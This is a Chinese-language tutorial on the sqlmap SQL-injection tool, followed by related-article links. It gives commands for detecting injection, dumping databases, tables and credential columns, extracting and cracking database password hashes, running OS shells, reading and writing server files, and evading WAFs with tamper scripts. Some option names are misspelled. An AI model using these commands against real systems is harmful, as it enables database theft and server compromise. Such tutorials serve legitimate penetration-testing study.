sqlmap使用教程
目录
sqlmap基础使用
1、判断是否存在注入
2、判断文本中的请求是否存在注入
3、查询当前用户下的所有数据库
4、获取数据库中的表名
5、获取表中的字段名
6、获取字段内容
7、获取数据库所有用户
8、获取数据库用户的密码
9、获取当前网站数据库的名称
10、获取当前网站数据库的用户名称
SQLMap进阶:参数讲解
1、--level 5: 探测等级
2、--is-dba:当前用户是否为管理权限
3、--roles:列出数据库管理员的角色
4、--referer:http referer头
5、--sql-shell运行自定义的sql语句
6、--os-cmd,--os-shell:运行任意操作系统的命令
7、--fire-read:从数据库服务器中读取文件
8、 --fire-write --file-dest:上传文件到数据库服务器中
SQLMap自带绕过脚本tamper
一些常用的tamper脚本:
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap基础使用
1、判断是否存在注入
sqlmap.py -u url
(如果注入点后面的参数大于等于两个,需要加双引号)
2、判断文本中的请求是否存在注入
Sqlmap.py -r desktop/1.txt
一般在存在cookies注入的情况下使用
3、查询当前用户下的所有数据库
sqlmap.py -u url --dbs
确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。
4、获取数据库中的表名
sqlmap.py -u “url” -D dkeye(具体数据库) --tables
如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询
5、获取表中的字段名
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns
查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C
6、获取字段内容
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump
7、获取数据库所有用户
sqlmap.py -u url --users
列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
8、获取数据库用户的密码
sqlmap.py -u url --passwords
如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。
9、获取当前网站数据库的名称
sqlmap.py -u url --curerent-db
使用该命令可以列出当前网站使用的数据库
10、获取当前网站数据库的用户名称
sqlmap.py -u url --current-user
使用该命令可以列出当前网站使用的数据库用户
SQLMap进阶:参数讲解
1、--level 5: 探测等级
参数 -- level 指需要执行的测试等级,一共有5个等级(1-5),可以不加level。默认是1。
http cookies在level为2时就会测试, user-Agent/Referer在level为3时就会测试。
2、--is-dba:当前用户是否为管理权限
sqlmap.py -u url --is-dba
如果是数据库管理员账户,会返回true
3、--roles:列出数据库管理员的角色
该命令仅适用于数据库时oracle时
4、--referer:http referer头
sqlmap可以在请求中伪造http中的referer,当--level参数设定为3或者3以上时,会尝试对referer进行注入。可以通过referer的命令来欺骗,比如--referer http://www.baidu.com
5、--sql-shell运行自定义的sql语句
该命令被用于执行指定的sql语句
shell来指定语句
sqlmap.py -u url --sql-shell
6、--os-cmd,--os-shell:运行任意操作系统的命令
7、--fire-read:从数据库服务器中读取文件
该命令用于读取执行文件
sqlmap.py -u url \--file-read "c:/examplr.exe" -v 1
8、 --fire-write --file-dest:上传文件到数据库服务器中
写入本地文件到服务器中,如果使用的数据库为mysql、postgresql、microsoft sql server ,并且当前用户有权限使用特定的函数时,上传的文件可以是文本,也可以是二进制文件。
SQLMap自带绕过脚本tamper
sqlmap在默认情况下除了使用CHAR()函数防止出现单引号,没有对注入的数据进行修改。我们可以通过--tamper参数对数据作修改来绕过WAF等设备
命令方式:
sqlmap.py XXXXXX --tamper “模块名”
在日常使用中我们可以用参数--identify-waf进行检测
一些常用的tamper脚本:
apostrophemask.py 过滤单引号,把单引号换为UTF-8base64encode.py 替换为base64编码multiplespaces.py 围绕sql关键字添加多个空格space2plus.py 用+来替换空格nonrecursivereplacement.py 用双重语句替代预定义的sql关键字。。。。。。
tamper脚本过多,我们可以在需要的时候自己去寻找,也可以自己编写去应对各种复杂的环境
sqlmap使用教程相关推荐
- sqlmap 注入教程 常用命令大全
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage –hh 帮助手册 ...
- sqlmap详细教程
目录 前言 一.sqlmap 二.易受攻击的网址 三.使用 SQL map 进行黑客攻击 1. 扫描远程系统 2. 发现数据库 3. 在特定数据库中查找表 4. 获取表的列 5. 从表中获取数据 接下 ...
- SQLmap注入教程
一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u "存在注入url" 爆出所有数据库名字:sqlmap.py -u "存在注入url ...
- SQLMAP注入教程-11种常见SQLMAP使用方法
一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...
- sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程
昨天对一个网站做渗透测试,本来想自己写脚本来sql注入的,但是觉得麻烦还是用了sqlmap 这一用发现sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,觉得这样就够用了,直到昨天才发 ...
- linux下sqlmap安装教程,(转)Sqlmap官网下载与安装教程[windows/linux版本]
转自:http://www.vuln.cn/2000 sqlmap的功能与强大性不必多言,方便大家下载,给大家整理了下sqlmap最新版的官网与github下载地址. 官网下载地址 github下载 ...
- SQLMap使用教程:从入门到入狱详细指南
项目地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool SQLMap支持市面上常见 ...
- 史上最详细sqlmap入门教程
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种. ...
- sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...
- SQL注入之sqlmap入门教程
目录 一.判断是否存在注入点 二.查询当前用户下所有数据库 三.获取数据库中的表名 四.获取表中的字段名 五.获取字段内容 六.获取数据库的所有用户 七.获取数据库用户的密码 八.获取当前网站数据库的 ...
最新文章
- MyBatis拦截器原理探究
- java parallelstream_关于Java8 parallelStream并发安全的深入讲解
- python安装多久_python安装与使用
- 今天看到一篇小册子上的话
- 公司发声明了!禁止所有程序员使用 Lombok !再使用绩效直接打C!
- 活动文档服务器,ACTIVEDOC 示例:实现活动文档服务器
- 论文笔记_S2D.73_2019_BTS_从大到小:多尺度局部平面引导的单目深度估计
- Google Python 编程风格指南
- 数学与逻辑思维(一)
- cad 打开硬件加速卡_CAD:“你的图纸缺少shx字体!”“不存在的!”
- 战德臣计算机导论第5讲,地方高校“计算机导论”算法思维培养的教学设计
- jsp房屋出租管理系统带合同
- KU FPGA DDR4 SDRAM仿真/板卡测试
- 第六章 SQL命令 CREATE INDEX(一)
- iptables设置映射通过外网端口代理ssh登录内网服务器
- 数据结构课程设计(学生成绩管理系统)
- irqbalance机制分析
- matlab RGB到HSI的彩色转换及实现
- 计算机无法识别硬盘怎么办,硬盘电脑不识别怎么办?硬盘数据怎么恢复?
- Vue项目使用splitpanes插件(垂直水平分割窗口)
热门文章
- 裴(pei)蜀定理 知识点
- 《Python数据分析实战》3 NumPy库
- windows2003事件记录中显示组策略错误,登录域控制器很慢(服务器自身)
- 借书问题(入门级算法)(C语言)
- zed相机拆机_轻松实现位置追踪,Stereolabs推出二代ZED相机
- python网站上搜索答案_用python搭建百万赢家自动搜索答案
- 梅创社c语言课本答案解析,c语言程序设计第2版) 教学课件 作者 梅创社答案 第一章答案.docx...
- C++11多线程join()和detach()
- a href='../目录 +变量+ ' download='../目录 +变量+“'查看附件/a 使用变量
- win10计算机优化技巧,教你win10优化技巧